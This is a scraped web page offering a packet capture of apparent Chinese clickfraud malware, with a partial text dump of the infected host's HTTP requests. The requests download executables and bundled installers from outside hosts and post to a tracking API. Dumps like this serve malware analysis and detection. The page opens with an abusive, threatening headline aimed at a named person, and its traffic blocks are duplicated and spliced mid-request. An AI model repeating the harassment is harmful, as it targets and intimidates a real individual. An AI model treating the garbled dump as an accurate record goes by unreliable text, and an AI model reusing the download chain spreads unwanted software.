Text Example

LAWRENCE KNACHEL IS A TROGLYODYTE PIECE OF SH!T - 3600 VISITORS DAILY WILL KNOW YOUR DAY IS COMING SOON

accat83_420742.exe zol.com.cn Unknown baizhu.cc Chinese Clickfraud Malware PCAP file download

Download Attachments

  • 1 pcap accat83
    Date added: October 26, 2016 5:32 am Added by: admin File size: 1 MB Downloads: 76

2016-10-25 22:50:26.808695 IP 192.168.1.102.60855 > 222.163.80.69.80: Flags [P.], seq 0:313, ack 1, win 256, length 313: HTTP: GET /skycndownernew/accat83_420742.exe HTTP/1.1
E..ad.@……..f..PE…P=..0s%..P….,..GET /skycndownernew/accat83_420742.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down10.zol.com.cn
Connection: Keep-Alive

2016-10-25 22:50:38.567607 IP 192.168.1.102.60857 > 222.73.144.174.80: Flags [.], ack 3917, win 260, length 0
E..(-.@……..f.I…..P|.&…..P…^………

E..(7.@……..fx.m….P….c…P…~………
2016-10-25 22:50:41.309783 IP 192.168.1.102.60858 > 120.26.109.229.80: Flags [P.], seq 0:208, ack 1, win 256, length 208: HTTP: POST /api/getdown HTTP/1.1
E…7.@……..fx.m….P….c…P…….POST /api/getdown HTTP/1.1
Host: api.baizhu.cc
Content-Length: 16
Connection:close
Accept-Language: zh-cn
Cache-Conbtrol:no-cache
Content-Type:application/x-www-form-urlencoded

&appid=1&sid=360


E..(“.@…A3…fh.l….P”….1[.P…3………
2016-10-25 22:50:42.378076 IP 192.168.1.102.60859 > 104.192.108.21.80: Flags [P.], seq 0:283, ack 1, win 64240, length 283: HTTP: GET /partner/Inst13__3112087__3f7372633d6c6d266c733d6e31343463316364383939__

2016-10-25 22:50:51.890950 IP 192.168.1.102.60866 > 106.120.177.204.80: Flags [P.], seq 0:232, ack 1, win 256, length 232: HTTP: GET /hz/IQIYIsetup_qudao@kb096.exe HTTP/1.1
E…..@….g…fjx…..PN.. ..S.P…d…GET /hz/IQIYIsetup_qudao@kb096.exe HTTP/1.1
Host: dl.static.iqiyi.com
Accept:*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Connection:close
Cache-Control: no-cache
Range: bytes=0-

2016-10-25 22:50:51.890966 IP 192.168.1.102.60865 > 123.125.112.215.80: Flags [P.], seq 0:236, ack 1, win 258, length 236: HTTP: GET /v1/t/full/p/mini/tn/10003908/ch_dl_url HTTP/1.1
E…(.@…#~…f{}p….P.3.k?C<.P…)A..GET /v1/t/full/p/mini/tn/10003908/ch_dl_url HTTP/1.1
Host: j.br.baidu.com
Accept:*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Connection:close
Cache-Control: no-cache
Range: bytes=0-

2016-10-25 22:50:51.902666 IP 192.168.1.102.60863 > 104.192.108.18.80: Flags [.], ack 249953, win 64240, length 0

E..(-J@….)…f.o…..Pg0H…&vP…(………
2016-10-25 22:50:52.051207 IP 192.168.1.102.60868 > 171.111.154.222.80: Flags [P.], seq 0:216, ack 1, win 256, length 216: HTTP: GET /1haitao10023.exe HTTP/1.1
E…-K@….P…f.o…..Pg0H…&vP….a..GET /1haitao10023.exe HTTP/1.1
Host: 1tdl.1haitao.com
Accept:*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Connection:close

68616f2e3336302e636e__0c70.exe HTTP/1.1
E..C”.@…@….fh.l….P”….1[.P…….GET /partner/Inst13__3112087__3f7372633d6c6d266c733d6e31343463316364383939__68616f2e3336302e636e__0c70.exe HTTP/1.1
Host: dl2.360safe.com
Accept:*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Connection:close
Cache-Control: no-cache

2016-10-25 22:50:42.475635 IP 192.168.1.102.60859 > 104.192.108.21.80: Flags [F.], seq 283, ack 293, win 63948, length 0
E..(“.@…A1…fh.l….P”….1].P…2p……..

E..(X.@…^….fy……P……..P………….
2016-10-25 22:50:43.183380 IP 192.168.1.102.60860 > 121.29.8.212.80: Flags [P.], seq 0:190, ack 1, win 256, length 190: HTTP: GET /baizhu.zip HTTP/1.1
E…X.@…]M…fy……P……..P…….GET /baizhu.zip HTTP/1.1
Host: cdn.baizhu.cc
Accept:*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Connection:close
Cache-Control: no-cache

 

2016-10-25 22:50:51.890950 IP 192.168.1.102.60866 > 106.120.177.204.80: Flags [P.], seq 0:232, ack 1, win 256, length 232: HTTP: GET /hz/IQIYIsetup_qudao@kb096.exe HTTP/1.1
E…..@….g…fjx…..PN..     ..S.P…d…GET /hz/IQIYIsetup_qudao@kb096.exe HTTP/1.1
Host: dl.static.iqiyi.com
Accept:*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Connection:close
Cache-Control: no-cache
Range: bytes=0-

2016-10-25 22:50:51.890966 IP 192.168.1.102.60865 > 123.125.112.215.80: Flags [P.], seq 0:236, ack 1, win 258, length 236: HTTP: GET /v1/t/full/p/mini/tn/10003908/ch_dl_url HTTP/1.1
E…(.@…#~…f{}p….P.3.k?C<.P…)A..GET /v1/t/full/p/mini/tn/10003908/ch_dl_url HTTP/1.1
Host: j.br.baidu.com
Accept:*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Connection:close
Cache-Control: no-cache
Range: bytes=0-

2016-10-25 22:50:51.902666 IP 192.168.1.102.60863 > 104.192.108.18.80: Flags [.], ack 249953, win 64240, length 0

E..(-J@….)…f.o…..Pg0H…&vP…(………
2016-10-25 22:50:52.051207 IP 192.168.1.102.60868 > 171.111.154.222.80: Flags [P.], seq 0:216, ack 1, win 256, length 216: HTTP: GET /1haitao10023.exe HTTP/1.1
E…-K@….P…f.o…..Pg0H…&vP….a..GET /1haitao10023.exe HTTP/1.1
Host: 1tdl.1haitao.com
Accept:*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Connection:close

Leave a Reply